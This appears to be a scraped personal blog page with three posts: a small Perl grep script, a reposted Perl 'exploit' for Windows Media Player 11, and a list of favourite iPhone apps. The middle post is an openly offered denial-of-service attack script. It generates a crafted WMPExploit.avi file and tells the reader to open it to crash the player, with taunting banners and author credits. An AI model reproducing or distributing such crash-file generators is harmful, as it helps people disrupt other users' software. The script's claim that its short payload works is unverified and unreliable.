#!/usr/bin/perl
#perl-grep.pl

my $regex = shift @ARGV;

print "Regex is [$regex]\n";

while ( <> )
        {
        print if m/$regex/;
        }

[root@"+":/tmp]$ perl perl-grep.pl new *.pl
Regex is [new]
my $new_name = "$dirname/$basename";
rename ($old_name, $new_name)
 or warn "Can't rename '$old_name' to '$new_name': $!";

[root@"+":/tmp]$

 

'Perl' 카테고리의 다른 글

Search the repeated pattern and Show what were matched.  (0) 2011.04.20
Search repeated pattern by PERL  (0) 2011.04.20
Posted by CEOinIRVINE
l
#!/usr/bin/perl
#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
#(+)Software  : Windows Media player
#(+)Version   : 11.0.5721.5145
#(+)Tested On : WIN-XP SP3
#(+) Date     : 31.03.2011
#(+) Hour     : 13:37
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

system("color 6");
system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
                                                                   
(+)Exploit Title:  Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
 
       
(+) Software  : Windows Media player
(+) Version   : 11.0.5721.5145                                   
(+) Tested On : WIN-XP SP3                                               
(+) Date      : 31.03.2011                                               
(+) Hour      : 13:37 PM                                                   
____________________________________________________________________\n    ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nWMPExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> WMPExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");

'Hacking' 카테고리의 다른 글

Firewall DoS Attacks  (0) 2011.07.28
IP Spoofing  (1) 2011.07.28
Antivirus and Security software coupons  (0) 2011.03.26
2011 Malware Trends  (0) 2011.03.26
Top Ten Antivirus 2012  (1) 2011.03.26
Posted by CEOinIRVINE
l

my useful iPhone APPs

IT 2011. 3. 31. 05:05

1. qTweeter


2. iFlash Drive
I always forgot to bring USB. So, this is very useful app for me.


3. MoneyBook


Very Simple. You can also backup / restore data. You can see your graph from your webpage, too.(https://my.moneybookapp.com/)

4. myWi (use my iphone as wifi connect point)


5. mxTube

Download popular you tube clips and watch anytime. You can also watch by using stream.

6. Anyring

You can choose your own ringtone for each user (default also).
(customized ringtone)

 


7. iProtect
Set Password on App.



8. iBlacklist (Phone # blacklist)


9. ToneFXs


10. WiFi Sync
(no line itune iphone SYNC)
^^

11.
iNag

for Nagios


12. my3G


enables to download file via 3G network (some app requires WIFI conncection)

13. fake call
14. fake sms

15. Call log deletes (recent one) one by one



16. Lock Info
Show a lot of information even if your phone is lock status.

Posted by CEOinIRVINE
l